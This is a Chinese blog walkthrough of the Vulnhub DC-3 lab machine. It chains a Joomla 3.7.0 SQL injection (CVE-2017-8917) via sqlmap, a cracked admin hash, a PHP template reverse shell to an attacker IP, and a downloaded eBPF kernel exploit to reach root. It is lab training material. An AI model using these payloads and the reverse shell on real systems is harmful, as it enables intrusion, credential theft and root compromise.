天道酬勤

【Vulnhub】— DC-3

 

主机发现

DC-3靶机的配置过程中出现了一点点的小问题,靶机一直寻找不到IP地址,看了网上大佬的解释,应该是网卡不匹配的原因,于是利用linux系统的拯救模式修改了网卡的配置信息,重启网卡,重启机器便获得了靶机的IP地址。待我完成这篇靶机,我补一个教程。

利用netdiscover命令发现目标机器为192.168.234.178

端口探测

使用Nmap

root@kali:~/桌面# nmap -sS -A -p 1-65535 192.168.234.178 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-08 15:02 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.178
Host is up (0.00055s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.178
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.234.178:80/
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.234.178:80/index.php/2-uncategorised/1-welcome
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.234.178:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=reset.request&Itemid=101
|     
|     Path: http://192.168.234.178:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.234.178:80/index.php
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.234.178:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|     
|     Path: http://192.168.234.178:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.234.178:80/index.php/2-uncategorised
|     Form id: login-form
|_    Form action: /index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
|   /language/en-GB/en-GB.xml: Joomla version 3.7.0
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2017-8917: 
|   VULNERABLE:
|   Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-8917
|     Risk factor: High  CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
|       An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
|       to execute aribitrary SQL commands via unspecified vectors.
|       
|     Disclosure date: 2017-05-17
|     Extra information:
|       User: root@localhost
|     References:
|       https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
| vulners: 
|   Apache httpd 2.4.18: 
|     	HTTPD:F564BBA32AA088833DA032B7EB77CA29	7.5	https://vulners.com/httpd/HTTPD:F564BBA32AA088833DA032B7EB77CA29
MAC Address: 00:0C:29:15:DC:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.234.178

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 365.77 seconds

由扫描的结果可知,目标机器只开启了80端口。使用的CMS为Joomla,存在注入漏洞,CVE-2017-8917。

CVE-2017-8917

这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。

在kali中利用searchsploit joomla查可利用的exp,结果发现joomla的漏洞也太多了,看的眼花缭乱。

还是在Github里面搜吧,searchsploit的结果也没显示CVE,不直接。

还好我们在这里看到了CVE-2017-8917在exploit-db中的序号,于是我们可以这样做,使用命令:

searchsploit joomla | grep 42033

再使用如下命令将exp保存到本地:

searchsploit joomla -m exploits/php/webapps/42033.txt

查看如何使用:

root@kali:~/桌面# cat 42033.txt 
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap: 

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)

看来要使用sqlmap

利用语句:

sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

得到以下几个数据库

[16:16:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[16:16:18] [INFO] fetching database names
[16:16:18] [INFO] used SQL query returns 5 entries
[16:16:18] [INFO] retrieved: 'information_schema'
[16:16:18] [INFO] retrieved: 'joomladb'
[16:16:18] [INFO] retrieved: 'mysql'
[16:16:18] [INFO] retrieved: 'performance_schema'
[16:16:18] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

紧接着重点看joomladb这个表

sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

看到了#__users,像这种带特殊符号的表,查询列的时候要带单引号”。

查询表下的列:

sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

有了username和password就好说了,直接dump。

Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

 

由上图可知,我们利用john破解密码,最后得出密码为snoopy

登录网站

网站的主界面告诉我们,此网站只有一个flag,而且我们必须获得root权限才可以获得flag。不管了,开干!

获取Flag

我们登录网站,输入账号密码。

把网站翻了一遍也没找到可以利用的地方,还是找后台吧。利用kali自带工具dirb

root@kali:~/桌面# dirb http://192.168.234.178/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb  8 20:27:29 2020
URL_BASE: http://192.168.234.178/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.234.178/ ----
==> DIRECTORY: http://192.168.234.178/administrator/                           
==> DIRECTORY: http://192.168.234.178/bin/                                     
==> DIRECTORY: http://192.168.234.178/cache/                                   
==> DIRECTORY: http://192.168.234.178/components/                              
==> DIRECTORY: http://192.168.234.178/images/                                  
==> DIRECTORY: http://192.168.234.178/includes/             

找到了后台地址http://192.168.234.178/administrator/

登录后台即可。

这个CMS就和Wordpress很像,找到其模板编辑位置,修改模板文件就可以利用。

在这里,想到的是利用php写一个反弹shell。

我们先找到编辑模板的位置,如下:

反弹shell

编辑文件index.php

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.234.151/7777 0>&1' ");
?> 

保存之后,我们在kali中开启监听。

使用命令,nc -lvp 7777

待监听好之后,我们访问index.php即可。

现在我们拿到shell了。

获取交互shell

使用命令python -c 'import pty;pty.spawn("/bin/bash")'

获取ROOT

查找带suid权限的文件 find / -user root -perm -4000 -print 2>/dev/null

但是发现没有可以利用的。可能这次考察的内核提权,利用命令uname -a,查看linux的内核。

www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

再利用searchsploit去查找exp。

root@kali:~# searchsploit linux 4.4.0-21
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x6 | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubun | exploits/linux/local/47170.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04  | exploits/linux/local/44300.c
--------------------------------------- ----------------------------------------

。。。。。。结果尝试了补天,还是不能成功。

接着我又试了CVE-2017-16995,还是没有成功。

看了大佬的文章,才知道利用的是linux拒绝服务漏洞进行提权。

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

 

直接使用wget下载到目标机,wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

unzip 39772.zip 
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  

----------------------------------------------------------------
tar -zxvf exploit.tar

gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
www-data@DC-3:/var/www/html/39772$ tar -xvf exp	
tar -xvf exploit.tar 
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c

-----------------------------------------------------------------
cd ebpf_mapfd_doubleput_exploit/
./compile.sh             //直接使用shell脚本进行编译,下面会报错,但是不影响。
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
------------------------------------------------------------------
接下来就是提权了。
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
id
id
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

本次完成靶机的过程比较艰难,第一次看这种内核提权,还是得多涨点经验。

 

赞(1) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub】— DC-3
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!

 

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏